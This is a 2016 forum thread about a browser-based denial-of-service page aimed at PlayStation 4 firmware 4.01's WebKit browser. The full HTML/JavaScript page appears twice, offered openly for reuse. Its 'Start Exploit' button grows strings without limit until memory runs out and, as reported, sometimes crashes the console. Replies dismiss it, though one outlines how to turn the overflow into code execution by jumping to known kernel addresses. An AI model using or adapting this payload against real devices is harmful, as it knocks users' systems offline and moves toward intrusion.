Post: PS4 4.01 Webkit DoS Exploit (Full System Crash Sometimes) by Insityyy
Options
10-29-2016, 04:55 AM
#1
Hydrogen
Super Mod
Insityyy states in his own words:
"So, I found a vulnerability that seems to work on PS4, I modified the HTML code a little, just to make it say Webkit crash at the top and to add a "start exploit" button, and to make it more reliable on the PS4 web browser.
Anyways, I have been testing this vulnerability out and it seems to sometimes crash the entire system and requires a reboot to be usable again.
I have a video of what it did after I tried this (after 1 reboot):"
He shared his code with the whole public community. If you think you can use it to make a new working work-a-round. Feel free:
<html>
<title>Not Enough Free System Memory DoS Exploit</title>
<head>
<script>
function dos()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
var longunistring5 = unescape("%u4545%u4545");
var longunistring6 = unescape("%u4646%u4646");
var longunistring7 = unescape("%u4747%u4747");
for(i=0; i <= 950 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
longunistring5+=longunistring5;
longunistring6+=longunistring6;
longunistring7+=longunistring7;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Start Exploit" onclick="dos();">
</body>
</html>
The following user groaned Hydrogen for this awful post:
10-29-2016, 06:15 AM
#2
Red-EyeX32
AstroCFG
Originally posted by Hydrogen
Hello NextGenUpdate, today, a member from PSXHAX, Insityyy, has showed us a PS4 4.01 Webkit DoS Exploit which he tries to use by editing some the HTML Code. He tells us that his system crashes sometimes, but sometimes the vulnerability it goes through. Insityyy also shares the coding with us to whomever likes to use it, and see if they can work around it.
Insityyy states in his own words:
"So, I found a vulnerability that seems to work on PS4, I modified the HTML code a little, just to make it say Webkit crash at the top and to add a "start exploit" button, and to make it more reliable on the PS4 web browser.
Anyways, I have been testing this vulnerability out and it seems to sometimes crash the entire system and requires a reboot to be usable again.
I have a video of what it did after I tried this (after 1 reboot):"
He shared his code with the whole public community. If you think you can use it to make a new working work-a-round. Feel free:
Insityyy states in his own words:
"So, I found a vulnerability that seems to work on PS4, I modified the HTML code a little, just to make it say Webkit crash at the top and to add a "start exploit" button, and to make it more reliable on the PS4 web browser.
Anyways, I have been testing this vulnerability out and it seems to sometimes crash the entire system and requires a reboot to be usable again.
I have a video of what it did after I tried this (after 1 reboot):"
He shared his code with the whole public community. If you think you can use it to make a new working work-a-round. Feel free:
<html>
<title>Not Enough Free System Memory DoS Exploit</title>
<head>
<script>
function dos()
{
var longunistring1 = unescape("%u4141%u4141");
var longunistring2 = unescape("%u4242%u4242");
var longunistring3 = unescape("%u4343%u4343");
var longunistring4 = unescape("%u4444%u4444");
var longunistring5 = unescape("%u4545%u4545");
var longunistring6 = unescape("%u4646%u4646");
var longunistring7 = unescape("%u4747%u4747");
for(i=0; i <= 950 ; ++i)
{
longunistring1+=longunistring1;
longunistring2+=longunistring2;
longunistring3+=longunistring3;
longunistring4+=longunistring4;
longunistring5+=longunistring5;
longunistring6+=longunistring6;
longunistring7+=longunistring7;
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
document.write(longunistring1);
document.write(longunistring2);
document.write(longunistring3);
document.write(longunistring4);
document.write(longunistring5);
document.write(longunistring6);
document.write(longunistring7);
}
</script>
</head>
<body>
<input type="button" value="Start Exploit" onclick="dos();">
</body>
</html>
This is retarded, this is no where near to being an exploit.
The following user thanked Red-EyeX32 for this useful post:
10-29-2016, 11:58 AM
#4
ProtoBuffers
Bounty hunter
..... TF did I just read how would that even being to work.
WTF is longunistring
why is DoS, HTML, and Java being used at the same time.
There is no output to the input. So please tell me what this is supposed to do XD
The only thing my mind understood was this PlayStation 4 is called PlayStation 4 and is using a 4.01 update.
Question: Is the PS4 update files stiil a potentially unwanted program (.PUP)?
WTF is longunistring
why is DoS, HTML, and Java being used at the same time.
There is no output to the input. So please tell me what this is supposed to do XD
The only thing my mind understood was this PlayStation 4 is called PlayStation 4 and is using a 4.01 update.
Question: Is the PS4 update files stiil a potentially unwanted program (.PUP)?
Last edited by
ProtoBuffers ; 10-29-2016 at 12:01 PM.
10-29-2016, 04:31 PM
#5
Hydrogen
Super Mod
Originally posted by xciergaming
..... TF did I just read how would that even being to work.
WTF is longunistring
why is DoS, HTML, and Java being used at the same time.
There is no output to the input. So please tell me what this is supposed to do XD
The only thing my mind understood was this PlayStation 4 is called PlayStation 4 and is using a 4.01 update.
Question: Is the PS4 update files stiil a potentially unwanted program (.PUP)?
WTF is longunistring
why is DoS, HTML, and Java being used at the same time.
There is no output to the input. So please tell me what this is supposed to do XD
The only thing my mind understood was this PlayStation 4 is called PlayStation 4 and is using a 4.01 update.
Question: Is the PS4 update files stiil a potentially unwanted program (.PUP)?
Aha, don't ask me, I just share the content. I let you all be the judge
10-29-2016, 08:52 PM
#7
escalion
Save Point
What has been demonstrated is a buffer overflow, which on it own is, as Red-Eye has said, useless.
What would be useful is to identify the point at which the memory is overflown.
Maybe creating a similar function but providing some sort of output so we can identify the point at which it crashes would be helpful.
The next stage after that would be to identify where in the memory we are overflowing to, and if it is useful... Maybe craft a section which will produce some sort of output; so we can see if we can execute from this memory location; and with what privilege it is being executed.
I can't envisage that the kernel memory layout is *too* different from 3.55 so it may be possible to try jump to a few 'known'-ish locations... you get the idea.
The problem with kernel memory is that it is 'protected' in the fact that the kernel 'hides' it from application space, so the only way this will be exploitable is if a kernel module itself is handling the allocation from webkit.
I haven't done a huge amount of research in PS4 security, but it seems that not much is being done to find a hardware exploit.. why guys?
What would be useful is to identify the point at which the memory is overflown.
Maybe creating a similar function but providing some sort of output so we can identify the point at which it crashes would be helpful.
The next stage after that would be to identify where in the memory we are overflowing to, and if it is useful... Maybe craft a section which will produce some sort of output; so we can see if we can execute from this memory location; and with what privilege it is being executed.
I can't envisage that the kernel memory layout is *too* different from 3.55 so it may be possible to try jump to a few 'known'-ish locations... you get the idea.
The problem with kernel memory is that it is 'protected' in the fact that the kernel 'hides' it from application space, so the only way this will be exploitable is if a kernel module itself is handling the allocation from webkit.
I haven't done a huge amount of research in PS4 security, but it seems that not much is being done to find a hardware exploit.. why guys?
11-02-2016, 02:25 AM
#8
ProtoBuffers
Bounty hunter
Originally posted by escalion
What has been demonstrated is a buffer overflow, which on it own is, as Red-Eye has said, useless.
What would be useful is to identify the point at which the memory is overflown.
Maybe creating a similar function but providing some sort of output so we can identify the point at which it crashes would be helpful.
The next stage after that would be to identify where in the memory we are overflowing to, and if it is useful... Maybe craft a section which will produce some sort of output; so we can see if we can execute from this memory location; and with what privilege it is being executed.
I can't envisage that the kernel memory layout is *too* different from 3.55 so it may be possible to try jump to a few 'known'-ish locations... you get the idea.
The problem with kernel memory is that it is 'protected' in the fact that the kernel 'hides' it from application space, so the only way this will be exploitable is if a kernel module itself is handling the allocation from webkit.
I haven't done a huge amount of research in PS4 security, but it seems that not much is being done to find a hardware exploit.. why guys?
What would be useful is to identify the point at which the memory is overflown.
Maybe creating a similar function but providing some sort of output so we can identify the point at which it crashes would be helpful.
The next stage after that would be to identify where in the memory we are overflowing to, and if it is useful... Maybe craft a section which will produce some sort of output; so we can see if we can execute from this memory location; and with what privilege it is being executed.
I can't envisage that the kernel memory layout is *too* different from 3.55 so it may be possible to try jump to a few 'known'-ish locations... you get the idea.
The problem with kernel memory is that it is 'protected' in the fact that the kernel 'hides' it from application space, so the only way this will be exploitable is if a kernel module itself is handling the allocation from webkit.
I haven't done a huge amount of research in PS4 security, but it seems that not much is being done to find a hardware exploit.. why guys?
HCF command omg O_O why do all this whatever tf this is
Copyright © 2024, NextGenUpdate.
All Rights Reserved.
